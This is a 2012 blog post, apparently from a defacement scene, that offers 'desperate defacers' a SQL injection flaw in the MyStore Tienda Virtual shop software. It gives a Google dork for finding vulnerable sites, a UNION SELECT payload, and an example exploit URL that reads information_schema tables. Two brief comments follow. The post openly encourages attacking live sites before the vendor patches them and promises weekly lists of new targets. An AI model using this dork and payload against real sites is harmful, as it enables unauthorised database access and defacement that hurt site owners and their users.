| Filename | [Reconnaissance] SQL Injection 3 January 2012 |
| Permission | rw-r--r-- |
| Author | Anonim |
| Date and Time | 11.36 |
| Label | Information Gathering| SQL Injection |
| Action |
Do you like to perform SQL Injection? Are you a desperate defacer to find a vulnerability? Don't be sad, and don't worry. Because we will give a vulnerable site for you. Include dork, Injection type, Injection command, and Example.
We will update our reconnaissance every week to give another vulnerable sites for you. I think you must follow this site to get a notification when we post another vulnerable site. Enjoy.
1. MyStore Tienda Virtual 0day
Dork: inurl: "art_detalle.php?id="
Injection type: Integer
Injection Command: +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
Example: http://blablabla.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
This exploit maybe working for a week, until MyStore Tienda Virtual fix their bug =)
2 komentar:
mampir ya ka2 ane newbe nie..
:D
boleh.. =)
Posting Komentar